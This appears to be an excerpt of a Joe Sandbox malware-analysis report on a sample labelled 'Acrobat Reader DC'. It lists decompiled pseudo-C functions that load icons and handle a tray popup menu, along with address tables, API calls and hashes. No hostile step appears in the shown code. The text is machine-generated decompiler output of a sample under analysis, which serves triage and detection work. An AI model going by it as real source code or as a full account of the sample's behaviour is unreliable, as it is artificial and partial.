                                  0x00448bef
                                  0x00448bf4
                                  0x00448bfb
                                  0x00448c09
                                  0x00448c09
                                  0x00448bfb
                                  0x00448c17
                                  0x00448bc5
                                  0x00448bc9
                                  0x00448bd4
                                  0x00000000
                                  0x00000000
                                  0x00448bd4
                                  0x00448bc3
                                  0x00000000
                                  0x004487dc
                                  0x004487e3
                                  0x00000000
                                  0x00448aeb
                                  0x00448aee
                                  0x00448c29
                                  0x00448c2d
                                  0x00448c2f
                                  0x00448c31
                                  0x00448c36
                                  0x00000000
                                  0x00448af4
                                  0x00448af5
                                  0x00448b0d
                                  0x00448b11
                                  0x00448b16
                                  0x00448b18
                                  0x00448b1d
                                  0x00448b1e
                                  0x00448b26
                                  0x00000000
                                  0x00000000
                                  0x00448af7
                                  0x00448af7
                                  0x00448b05
                                  0x00000000
                                  0x00448b05
                                  0x00448af5
                                  0x00000000
                                  0x00000000
                                  0x004488e1
                                  0x004488e7
                                  0x004488f2
                                  0x004488f9
                                  0x004488fb
                                  0x00448901
                                  0x00448901
                                  0x00448908
                                  0x00448915
                                  0x0044891c
                                  0x00000000
                                  0x0044891c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004489dd
                                  0x004489e0
                                  0x004489e9
                                  0x004489f1
                                  0x004489f9
                                  0x00448a09
                                  0x00000000
                                  0x00448a18
                                  0x00448a1a
                                  0x00448a1c
                                  0x00448a1c
                                  0x00448a27
                                  0x00448a29
                                  0x00448a29
                                  0x00448a33
                                  0x00448a35
                                  0x00448a35
                                  0x00448a42
                                  0x00448a49
                                  0x00448a49
                                  0x00448a4e
                                  0x00448a51
                                  0x00448a55
                                  0x00448a5e
                                  0x00448a62
                                  0x00448a6e
                                  0x00448a75
                                  0x00448a78
                                  0x00448a89
                                  0x00448a95
                                  0x00448a97
                                  0x00000000
                                  0x00448a97
                                  0x00448a70
                                  0x00448a70
                                  0x00448a72
                                  0x00448a99
                                  0x00448a99
                                  0x00448a9d
                                  0x00448a9d
                                  0x00448aa3
                                  0x00448aa7
                                  0x00448aaa
                                  0x00000000
                                  0x00448aaa
                                  0x00000000
                                  0x00000000
                                  0x00448927
                                  0x0044892d
                                  0x00448933
                                  0x00448938
                                  0x0044893d
                                  0x0044893f
                                  0x00448941
                                  0x00448946
                                  0x0044894b
                                  0x0044894f
                                  0x00448957
                                  0x0044895f
                                  0x00448969
                                  0x0044896e
                                  0x0044896e
                                  0x00448972
                                  0x00448975
                                  0x0044897b
                                  0x00448988
                                  0x00448990
                                  0x00448992
                                  0x00448995
                                  0x004489a1
                                  0x004489a1
                                  0x004489a8
                                  0x004489ae
                                  0x004489bd
                                  0x004489c2
                                  0x004489c7
                                  0x004489ca
                                  0x004489d6
                                  0x004489d6
                                  0x00000000
                                  0x00000000
                                  0x00448c3c
                                  0x00448c3f
                                  0x00448c4f
                                  0x00448c57
                                  0x00448c62
                                  0x00448c6f
                                  0x00448c74
                                  0x00000000
                                  0x00448c7a
                                  0x00448c7d
                                  0x00448c81
                                  0x00448c89
                                  0x00448c91
                                  0x00448c99
                                  0x00448ca3
                                  0x00448ca5
                                  0x00448caa
                                  0x00448cb8
                                  0x00448cbe
                                  0x00448cc6
                                  0x00448cd0
                                  0x00448cd0
                                  0x00448cda
                                  0x00448c1c
                                  0x00448c26
                                  0x00448ce0
                                  0x00448ce5
                                  0x00448ce7
                                  0x00448ce7
                                  0x00448cf5
                                  0x00448cf7
                                  0x00448cf7
                                  0x00448cff
                                  0x00448d0b
                                  0x00448d13
                                  0x00448d19
                                  0x00448d1a
                                  0x00448d1b
                                  0x00448d1f
                                  0x00448d1f
                                  0x00448cda
                                  0x00000000
                                  0x00000000
                                  0x0044882a
                                  0x00448835
                                  0x0044883c
                                  0x0044883c
                                  0x00448842
                                  0x00448848
                                  0x00000000
                                  0x0044884a
                                  0x0044884a
                                  0x0044884c
                                  0x0044884f
                                  0x00448856
                                  0x00000000
                                  0x00448876
                                  0x00448876
                                  0x0044887e
                                  0x0044888d
                                  0x00448893
                                  0x00448896
                                  0x00448898
                                  0x0044889f
                                  0x004488a9
                                  0x004488b1
                                  0x004488bd
                                  0x004488c3
                                  0x004488c6
                                  0x004488d3
                                  0x004488d3
                                  0x0044887e
                                  0x00448856
                                  0x00000000
                                  0x00448868
                                  0x00448868
                                  0x00448869
                                  0x00448871
                                  0x00000000
                                  0x00000000
                                  0x00448ab8
                                  0x00448aba
                                  0x00448ac9
                                  0x00448ad7
                                  0x00448ad9
                                  0x00448adf
                                  0x00448adf
                                  0x00000000
                                  0x00448ad7
                                  0x00000000
                                  0x00000000
                                  0x00448804
                                  0x00448806
                                  0x00448809
                                  0x0044880f
                                  0x0044881f
                                  0x00000000
                                  0x0044881f
                                  0x00000000
                                  0x00000000
                                  0x004487ec
                                  0x004487ef
                                  0x004487fa
                                  0x00448b28
                                  0x00448b28
                                  0x00448b28
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004487e3
                                  0x0044873a
                                  0x0044873a
                                  0x00448742
                                  0x00448742
                                  0x00000000

                                  APIs
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window
                                  • String ID: 0
                                  • API String ID: 2353593579-4108050209
                                  • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                  • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                  • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                  • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004341E6(intOrPtr _a4, int _a8, short* _a12, long _a16) {
				void* __edi;
				long _t9;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				char* _t24;
				short* _t25;

				_t25 = _a12;
				_t9 = 0;
				_t24 = _a16;
				 *_t24 = 0;
				_a16 = 0;
				if( *_t25 == 0) {
					L13:
					return _t9;
				} else {
					if(E004114AB(_t24, _t25, L"blank") != 0) {
						_t11 = E004114AB(_t24, _t25, L"info");
						if(_t11 == 0) {
							return LoadIconW(_t11, 0x7f04);
						}
						_t12 = E004114AB(_t24, _t25, L"question");
						if(_t12 != 0) {
							_t13 = E004114AB(_t24, _t25, L"stop");
							if(_t13 != 0) {
								_t14 = E004114AB(_t24, _t25, L"warning");
								if(_t14 != 0) {
									ExtractIconExW(_t25, _a8, 0,  &_a16, 1);
									_t9 = _a16;
									if(_t9 == 0) {
										goto L13;
									} else {
										 *_t24 = 1;
										return _t9;
									}
								} else {
									return LoadIconW(_t14, 0x7f03);
								}
							} else {
								return LoadIconW(_t13, 0x7f01);
							}
						} else {
							return LoadIconW(_t12, 0x7f02);
						}
					} else {
						return  *((intOrPtr*)(_a4 + 0x1b0));
					}
				}
			}











                                  0x004341ea
                                  0x004341ed
                                  0x004341f0
                                  0x004341f3
                                  0x004341f5
                                  0x004341fb
                                  0x004342da
                                  0x004342da
                                  0x00434201
                                  0x00434211
                                  0x004342bb
                                  0x004342c5
                                  0x00000000
                                  0x004342d1
                                  0x0043422c
                                  0x00434236
                                  0x00434250
                                  0x0043425a
                                  0x00434274
                                  0x0043427e
                                  0x0043429f
                                  0x004342a5
                                  0x004342aa
                                  0x00000000
                                  0x004342ac
                                  0x004342ac
                                  0x004342b2
                                  0x004342b2
                                  0x00434280
                                  0x0043428f
                                  0x0043428f
                                  0x0043425c
                                  0x0043426b
                                  0x0043426b
                                  0x00434238
                                  0x00434247
                                  0x00434247
                                  0x00434217
                                  0x00434223
                                  0x00434223
                                  0x00434211

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$IconLoad
                                  • String ID: blank$info$question$stop$warning
                                  • API String ID: 2485277191-404129466
                                  • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                  • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                  • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                  • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00468B0E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 207windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E00468B0E(void* __fp0, struct tagMENUITEMINFOW** _a4, struct HWND__* _a8, intOrPtr _a12) {
				struct HMENU__* _v12;
				struct tagPOINT _v20;
				struct tagMENUITEMINFOW _v68;
				signed int _t51;
				signed int _t85;
				struct HWND__* _t87;
				struct HMENU__** _t88;
				void* _t99;

				_t99 = __fp0;
				_t88 = _a4;
				_v68.cbSize = 0x30;
				E00412F40( &(_v68.fMask), 0, 0x2c);
				_t51 = _a12 + 0xfffffe00;
				_t85 = 0;
				_v12 = _t88[0x274];
				if(_t51 > 6) {
					L20:
					if((_t88[3] & _t85) == 0 ||  *0x4974eb == 0) {
						L34:
						return _t51;
					} else {
						if(_t88[1] == 0) {
							DeleteMenu( *_t88, 5, 0);
							DeleteMenu( *_t88, 4, 0);
							DeleteMenu( *_t88, 6, 0);
							DeleteMenu( *_t88, 3, 0);
							_t88[2] = 0;
						} else {
							if(_t88[2] == 0) {
								if(GetMenuItemCount( *_t88) > 0) {
									_t88[0x274] = 4;
									E0045FBAC(_t88, 0, 0x484ea8, 0xffffffff, 0xffffffff, 0);
								}
								_t88[0x274] = 3;
								E0045FBAC(_t88, 0, _t88[0x1f], 0xffffffff, 0xffffffff, 0);
								_t88[0x274] = 5;
								E0045FBAC(_t88, 0, 0x484ea8, 0xffffffff, 0xffffffff, 0);
								_t88[0x274] = 2;
								E0045FBAC(_t88, 0, _t88[0x1b], 0xffffffff, 0xffffffff, 0);
								_t88[0x274] = _v12;
								_t88[2] = 1;
							}
						}
						_t51 = GetMenuItemCount( *_t88);
						if(_t51 <= 0) {
							goto L34;
						} else {
							if(_t88[1] != 0) {
								if(_t88[1] != 0) {
									 *0x4974ec = 1;
									_v68.fMask = 1;
									_v68.fState = 8;
									SetMenuItemInfoW( *_t88, 4, 0,  &_v68);
								}
							} else {
								_t88[1] = 0;
							}
							GetCursorPos( &_v20);
							_t87 = _a8;
							SetForegroundWindow(_t87);
							TrackPopupMenuEx( *_t88, 0, _v20, _v20.y, _t87, 0);
							PostMessageW(_t87, 0, 0, 0);
							return E00401B80(_t88, _t99);
						}
					}
				}
				switch( *((intOrPtr*)(_t51 * 4 +  &M00468D82))) {
					case 0:
						__edi = 0x40;
						_push(0xfffffff5);
						goto L19;
					case 1:
						_t85 = 1;
						_push(0xfffffff9);
						goto L19;
					case 2:
						__edi = 2;
						_push(0xfffffff8);
						goto L19;
					case 3:
						__eflags =  *((char*)(__esi + 0xa));
						__edi = 4;
						if(__eflags == 0) {
							L14:
							_push(0xfffffff3);
							goto L19;
						}
						__ebx = 7;
						_v68.fMask = 1;
						_v68.fState = 8;
						__eflags = __ecx - 7;
						if(__eflags < 0) {
							goto L14;
						} else {
							_a4 = __esi + 0x1d0;
							do {
								__eax = _a4;
								__eax =  *_a4;
								__eflags = __eax;
								if(__eax == 0) {
									goto L11;
								}
								__ecx =  &_v68;
								__eax = GetMenuItemInfoW( *__eax, __ebx, 0, __ecx);
								__eflags = __eax;
								if(__eax == 0) {
									goto L11;
								}
								__eflags = _v68.fState & 0x00001000;
								if((_v68.fState & 0x00001000) == 0) {
									goto L11;
								}
								__eax = _a4;
								__ecx =  *_a4;
								__eflags = __ecx->cbSize -  *__esi;
								if(__eflags == 0) {
									__eax = E00453B6F(__ecx, __eflags, __esi, __ebx);
									goto L14;
								}
								L11:
								_a4 = _a4 + __edi;
								__ebx = __ebx + 1;
								__eflags = __ebx -  *((intOrPtr*)(__esi + 0x9d0));
							} while (__eflags <= 0);
							_push(0xfffffff3);
							goto L19;
						}
					case 4:
						__edi = 8;
						_push(0xfffffff7);
						goto L19;
					case 5:
						__edi = 0x10;
						_push(0xfffffff6);
						goto L19;
					case 6:
						__edi = 0x20;
						_push(0xfffffff2);
						L19:
						_push(_t88);
						_t51 = E00453B16(_t74, _t91);
						goto L20;
				}
			}











                                  0x00468b0e
                                  0x00468b16
                                  0x00468b22
                                  0x00468b29
                                  0x00468b37
                                  0x00468b3f
                                  0x00468b41
                                  0x00468b47
                                  0x00468c12
                                  0x00468c15
                                  0x00468d7f
                                  0x00468d7f
                                  0x00468c28
                                  0x00468c32
                                  0x00468cd9
                                  0x00468ce2
                                  0x00468ceb
                                  0x00468cf4
                                  0x00468cf6
                                  0x00468c38
                                  0x00468c3c
                                  0x00468c49
                                  0x00468c59
                                  0x00468c63
                                  0x00468c63
                                  0x00468c75
                                  0x00468c7f
                                  0x00468c92
                                  0x00468c9c
                                  0x00468cae
                                  0x00468cb8
                                  0x00468cc0
                                  0x00468cc6
                                  0x00468cc6
                                  0x00468c3c
                                  0x00468cfd
                                  0x00468d01
                                  0x00000000
                                  0x00468d03
                                  0x00468d07
                                  0x00468d13
                                  0x00468d20
                                  0x00468d27
                                  0x00468d2e
                                  0x00468d35
                                  0x00468d35
                                  0x00468d09
                                  0x00468d09
                                  0x00468d09
                                  0x00468d3f
                                  0x00468d45
                                  0x00468d49
                                  0x00468d5f
                                  0x00468d6c
                                  0x00000000
                                  0x00468d74
                                  0x00468d01
                                  0x00468c15
                                  0x00468b4d
                                  0x00000000
                                  0x00468c05
                                  0x00468c0a
                                  0x00000000
                                  0x00000000
                                  0x00468b54
                                  0x00468b59
                                  0x00000000
                                  0x00000000
                                  0x00468b60
                                  0x00468b65
                                  0x00000000
                                  0x00000000
                                  0x00468b6c
                                  0x00468b70
                                  0x00468b75
                                  0x00468be6
                                  0x00468be6
                                  0x00000000
                                  0x00468be6
                                  0x00468b77
                                  0x00468b7c
                                  0x00468b83
                                  0x00468b8a
                                  0x00468b8c
                                  0x00000000
                                  0x00468b8e
                                  0x00468b94
                                  0x00468b9e
                                  0x00468b9e
                                  0x00468ba1
                                  0x00468ba3
                                  0x00468ba5
                                  0x00000000
                                  0x00000000
                                  0x00468ba9
                                  0x00468bb1
                                  0x00468bb7
                                  0x00468bb9
                                  0x00000000
                                  0x00000000
                                  0x00468bbb
                                  0x00468bc2
                                  0x00000000
                                  0x00000000
                                  0x00468bc4
                                  0x00468bc7
                                  0x00468bcb
                                  0x00468bcd
                                  0x00468be1
                                  0x00000000
                                  0x00468be1
                                  0x00468bcf
                                  0x00468bcf
                                  0x00468bd2
                                  0x00468bd3
                                  0x00468bd3
                                  0x00468bdb
                                  0x00000000
                                  0x00468bdb
                                  0x00000000
                                  0x00468bea
                                  0x00468bef
                                  0x00000000
                                  0x00000000
                                  0x00468bf3
                                  0x00468bf8
                                  0x00000000
                                  0x00000000
                                  0x00468bfc
                                  0x00468c01
                                  0x00468c0c
                                  0x00468c0c
                                  0x00468c0d
                                  0x00000000
                                  0x00000000

                                  APIs
                                  • _memset.LIBCMT ref: 00468B29
                                  • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                  • GetMenuItemCount.USER32 ref: 00468C45
                                  • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                  • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                  • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                  • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                  • GetMenuItemCount.USER32 ref: 00468CFD
                                  • SetMenuItemInfoW.USER32 ref: 00468D35
                                  • GetCursorPos.USER32(?,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D3F
                                  • SetForegroundWindow.USER32(?,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D49
                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                  • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                  • String ID: 0
                                  • API String ID: 3993528054-4108050209
                                  • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                  • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                  • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                  • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0045FD57 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 227windowsleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0045FD57(void* __eflags, void* __fp0, signed int _a4, int _a8, int _a12) {
				int _v12;
				char _v16;
				int _v20;
				struct tagMENUITEMINFOW _v68;
				struct HMENU__** _t69;
				signed int _t81;
				int _t82;
				signed int _t85;
				intOrPtr _t86;
				signed int _t88;
				intOrPtr _t89;
				signed int _t91;
				unsigned int _t99;
				signed int _t100;
				struct HMENU__* _t101;
				int _t113;
				int _t114;
				int _t115;
				int _t118;
				int _t119;
				struct HMENU__** _t120;
				void* _t126;

				_t126 = __fp0;
				_t99 = _a8;
				_t120 = _a4;
				_v68.cbSize = 0x30;
				E00412F40( &(_v68.fMask), 0, 0x2c);
				_t102 =  &_a8;
				_v68.fMask = 1;
				_a8 = 0xffffffff;
				if(E00434179(_t120, _t99 & 0x0000ffff,  &_a8) == 0) {
					L38:
					__eflags = 0;
					return 0;
				} else {
					_t113 = _a8;
					_t69 =  *(_t120 + 0x1b4 + _t113 * 4);
					if(_t113 != 3) {
						__eflags = _t113 - 4;
						if(_t113 != 4) {
							_t100 = _t99 >> 0x10;
							__eflags = _t100;
							if(_t100 != 0) {
								goto L38;
							} else {
								__eflags = _a12 - _t100;
								if(_a12 != _t100) {
									goto L38;
								} else {
									__eflags =  *0x4974ec - _t100;
									if( *0x4974ec != _t100) {
										goto L38;
									} else {
										__eflags = _t120[1];
										_t101 =  *_t69;
										if(_t120[1] == 0) {
											L34:
											__eflags = _t120[1];
											if(__eflags == 0) {
												goto L33;
											} else {
												GetMenuItemInfoW(_t101, _t113, 0,  &_v68);
												__eflags = _v68.fState & 0x00000008;
												if((_v68.fState & 0x00000008) == 0) {
													_t62 =  &(_v68.fState);
													 *_t62 = _v68.fState | 0x00000008;
													__eflags =  *_t62;
													SetMenuItemInfoW(_t101, _t113, 0,  &_v68);
													E00453B6F( &_v68, __eflags, _t120, _t113);
													return 1;
												} else {
													_t59 =  &(_v68.fState);
													 *_t59 = _v68.fState ^ 0x00000008;
													__eflags =  *_t59;
													SetMenuItemInfoW(_t101, _t113, 0,  &_v68);
													E00453B6F( &_v68, __eflags, _t120, _t113);
													return 1;
												}
											}
										} else {
											__eflags = _t69[1];
											if(_t69[1] == 0) {
												goto L34;
											} else {
												_a12 = 0xffffffff;
												_t81 = GetMenuItemCount(_t101);
												__eflags = _t120[1];
												_a4 = _t81;
												if(_t120[1] != 0) {
													_t81 = _t81 - 4;
													__eflags = _t81;
													_a4 = _t81;
												}
												_t114 = 0;
												__eflags = _t81;
												if(_t81 <= 0) {
													_t82 = _a12;
													goto L22;
												} else {
													while(1) {
														_t82 = GetMenuItemID(_t101, _t114);
														__eflags = _t82 - _a8;
														if(_t82 == _a8) {
															break;
														}
														_t114 = _t114 + 1;
														__eflags = _t114 - _a4;
														if(_t114 < _a4) {
															continue;
														} else {
															L22:
															__eflags = _t82 - _a8;
															if(__eflags == 0) {
																break;
															}
														}
														goto L32;
													}
													_v12 = _t114;
													_t115 = _t114 - 1;
													__eflags = _t115;
													while(_t115 >= 0) {
														_a12 = GetMenuItemID(_t101, _t115);
														_t88 = E00434179(_t120, _t87,  &_v16);
														__eflags = _t88;
														if(_t88 == 0) {
															goto L26;
														} else {
															_t89 =  *((intOrPtr*)(_t120 + 0x1b4 + _a12 * 4));
															__eflags =  *((char*)(_t89 + 5));
															if( *((char*)(_t89 + 5)) != 0) {
																goto L26;
															}
														}
														goto L27;
														L26:
														_t115 = _t115 - 1;
														__eflags = _t115;
													}
													L27:
													_v20 = _t115 + 1;
													_t118 = _v12 + 1;
													__eflags = _t118 - _a4;
													while(_t118 < _a4) {
														_a12 = GetMenuItemID(_t101, _t118);
														_t85 = E00434179(_t120, _t84,  &_v16);
														__eflags = _t85;
														if(_t85 == 0) {
															goto L30;
														} else {
															_t86 =  *((intOrPtr*)(_t120 + 0x1b4 + _a12 * 4));
															__eflags =  *((char*)(_t86 + 5));
															if( *((char*)(_t86 + 5)) != 0) {
																goto L30;
															}
														}
														goto L31;
														L30:
														_t118 = _t118 + 1;
														__eflags = _t118 - _a4;
													}
													L31:
													_t102 = _v12;
													_t119 = _t118 - 1;
													__eflags = _t119;
													CheckMenuRadioItem(_t101, _v20, _t119, _v12, 0x400);
												}
												L32:
												_t113 = _a8;
												L33:
												E00453B6F(_t102, __eflags, _t120, _t113);
												return 1;
											}
										}
									}
								}
							}
						} else {
							_t91 = GetMenuItemInfoW( *_t120, _t113, 0,  &_v68);
							__eflags = _t91;
							if(_t91 == 0) {
								goto L38;
							} else {
								__eflags = _v68.fState & 0x00000008;
								if((_v68.fState & 0x00000008) == 0) {
									_t18 =  &(_v68.fState);
									 *_t18 = _v68.fState | 0x00000008;
									__eflags =  *_t18;
									 *0x4974ec = 1;
								} else {
									_v68.fState = _v68.fState ^ 0x00000008;
									 *0x4974ec = 0;
								}
								SetMenuItemInfoW( *_t120, 4, 0,  &_v68);
								E00401B80(_t120, _t126);
								Sleep(0x1f4);
								return 1;
							}
						}
					} else {
						 *0x4974f0 = 2;
						 *0x4974e6 = 1;
						return 1;
					}
				}
			}

























                                  0x0045fd57
                                  0x0045fd5e
                                  0x0045fd62
                                  0x0045fd6e
                                  0x0045fd75
                                  0x0045fd7d
                                  0x0045fd86
                                  0x0045fd8d
                                  0x0045fd9b
                                  0x0045ffb9
                                  0x0045ffb9
                                  0x0045ffbf
                                  0x0045fda1
                                  0x0045fda1
                                  0x0045fda4
                                  0x0045fdae
                                  0x0045fdcc
                                  0x0045fdcf
                                  0x0045fe37
                                  0x0045fe3a
                                  0x0045fe3c
                                  0x00000000
                                  0x0045fe42
                                  0x0045fe42
                                  0x0045fe45
                                  0x00000000
                                  0x0045fe4b
                                  0x0045fe4b
                                  0x0045fe51
                                  0x00000000
                                  0x0045fe57
                                  0x0045fe57
                                  0x0045fe5b
                                  0x0045fe5d
                                  0x0045ff53
                                  0x0045ff53
                                  0x0045ff57
                                  0x00000000
                                  0x0045ff59
                                  0x0045ff61
                                  0x0045ff6c
                                  0x0045ff6f
                                  0x0045ff94
                                  0x0045ff94
                                  0x0045ff94
                                  0x0045ff9f
                                  0x0045ffa7
                                  0x0045ffb4
                                  0x0045ff71
                                  0x0045ff71
                                  0x0045ff71
                                  0x0045ff71
                                  0x0045ff7c
                                  0x0045ff84
                                  0x0045ff91
                                  0x0045ff91
                                  0x0045ff6f
                                  0x0045fe63
                                  0x0045fe63
                                  0x0045fe67
                                  0x00000000
                                  0x0045fe6d
                                  0x0045fe6e
                                  0x0045fe75
                                  0x0045fe7b
                                  0x0045fe7f
                                  0x0045fe82
                                  0x0045fe84
                                  0x0045fe84
                                  0x0045fe87
                                  0x0045fe87
                                  0x0045fe8a
                                  0x0045fe8c
                                  0x0045fe8e
                                  0x0045feac
                                  0x00000000
                                  0x0045fe97
                                  0x0045fe97
                                  0x0045fe99
                                  0x0045fe9f
                                  0x0045fea2
                                  0x00000000
                                  0x00000000
                                  0x0045fea4
                                  0x0045fea5
                                  0x0045fea8
                                  0x00000000
                                  0x0045feaa
                                  0x0045feaf
                                  0x0045feaf
                                  0x0045feb2
                                  0x00000000
                                  0x00000000
                                  0x0045feb2
                                  0x00000000
                                  0x0045fea8
                                  0x0045feb8
                                  0x0045febb
                                  0x0045febb
                                  0x0045febc
                                  0x0045fecc
                                  0x0045fecf
                                  0x0045fed4
                                  0x0045fed6
                                  0x00000000
                                  0x0045fed8
                                  0x0045fedb
                                  0x0045fee2
                                  0x0045fee6
                                  0x00000000
                                  0x00000000
                                  0x0045fee6
                                  0x00000000
                                  0x0045fee8
                                  0x0045fee8
                                  0x0045fee8
                                  0x0045fee8
                                  0x0045feeb
                                  0x0045feec
                                  0x0045fef2
                                  0x0045fef3
                                  0x0045fef6
                                  0x0045ff06
                                  0x0045ff09
                                  0x0045ff0e
                                  0x0045ff10
                                  0x00000000
                                  0x0045ff12
                                  0x0045ff15
                                  0x0045ff1c
                                  0x0045ff20
                                  0x00000000
                                  0x00000000
                                  0x0045ff20
                                  0x00000000
                                  0x0045ff22
                                  0x0045ff22
                                  0x0045ff23
                                  0x0045ff23
                                  0x0045ff28
                                  0x0045ff28
                                  0x0045ff34
                                  0x0045ff34
                                  0x0045ff38
                                  0x0045ff38
                                  0x0045ff3e
                                  0x0045ff3e
                                  0x0045ff41
                                  0x0045ff43
                                  0x0045ff50
                                  0x0045ff50
                                  0x0045fe67
                                  0x0045fe5d
                                  0x0045fe51
                                  0x0045fe45
                                  0x0045fdd1
                                  0x0045fddb
                                  0x0045fde1
                                  0x0045fde3
                                  0x00000000
                                  0x0045fde9
                                  0x0045fdee
                                  0x0045fdf1
                                  0x0045fdff
                                  0x0045fdff
                                  0x0045fdff
                                  0x0045fe02
                                  0x0045fdf3
                                  0x0045fdf3
                                  0x0045fdf6
                                  0x0045fdf6
                                  0x0045fe14
                                  0x0045fe1c
                                  0x0045fe26
                                  0x0045fe34
                                  0x0045fe34
                                  0x0045fde3
                                  0x0045fdb0
                                  0x0045fdb0
                                  0x0045fdba
                                  0x0045fdc9
                                  0x0045fdc9
                                  0x0045fdae

                                  APIs
                                  • _memset.LIBCMT ref: 0045FD75
                                  • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                  • SetMenuItemInfoW.USER32 ref: 0045FE14
